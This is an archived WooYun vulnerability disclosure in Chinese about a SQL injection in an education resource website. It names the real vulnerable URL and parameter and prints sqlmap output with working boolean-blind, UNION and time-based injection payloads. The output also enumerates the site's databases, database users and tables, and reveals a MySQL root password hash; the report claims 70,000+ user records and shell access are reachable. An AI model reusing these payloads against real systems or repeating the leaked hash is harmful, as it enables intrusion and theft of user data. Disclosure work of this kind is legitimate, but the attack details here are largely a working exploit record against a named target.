乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-30: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-14: 厂商已经主动忽略漏洞,细节向公众公开
某教育资源网注入漏洞,泄露大量重要信息(root权限,可getshell)
注入漏洞 得到root 密码 连接数据库 泄露大量重要信息,7W多的注册用户 包括账号、密码、邮箱等。。。。 网站权限很大可以getshell 。。。。链接:http://www.yestime.net/scb/scb.php?id=2427
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=2427' AND 8988=8988 AND 'abcx'='abcx Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: id=-8745' UNION ALL SELECT NULL,NULL,CONCAT(0x3a7673773a,0x54535842795741465464,0x3a73616c3a),NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=2427' AND SLEEP(5) AND 'XgVW'='XgVW---[21:24:00] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0.11available databases [11]:[*] dnzi[*] dq[*] gwy[*] information_schema[*] jxfs[*] kejian[*] mysql[*] samht[*] test[*] wiki[*] yh1768[21:24:00] [INFO] fetching database users[21:24:00] [WARNING] the SQL query provided does not return any output[21:24:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[21:24:00] [INFO] fetching number of database users[21:24:00] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[21:24:00] [INFO] retrieved: 4[21:24:02] [INFO] retrieved: 'root'@'localhost'[21:24:29] [INFO] retrieved: 'yh1768'@'localhost'[21:25:00] [INFO] retrieved: 'root'@'%'[21:25:16] [INFO] retrieved: 'yh1768'@'%'database management system users [4]:[*] 'root'@'%'[*] 'root'@'localhost' [*] 'yh1768'@'%'[*] 'yh1768'@'localhost'current user: 'root@localhost'root : *421F9E38BF3518C8E538BB899967A50E07CBEDA0current database: 'kejian'article article_type, ask, ask_type, book, books, caimiyu, computer, computer_type, cycd, downcount, edudown, flash, flash_type, flash2, geturl, gkzl, host, hycd, jiaoan, jiazhang, jiazhang_type, jkbj, jtsh, jxfs, jxys, jxys_book, jyzx, keyword, kszx, kxjs, life, life_type, lunwen, lunwen_type, main, member, nnn, pay, pinyin, scb, scb_type, shwh, syjj, temp, tempid, wenxue, wzlist, xiehouyu, xinshang, xinshang_type, xyzx, yhcd, yingyu, yingyu_type, yxyl, zgbk, zongjie, zongjie_type, zuowen, zuowen_type
过滤。。。
未能联系到厂商或者厂商积极拒绝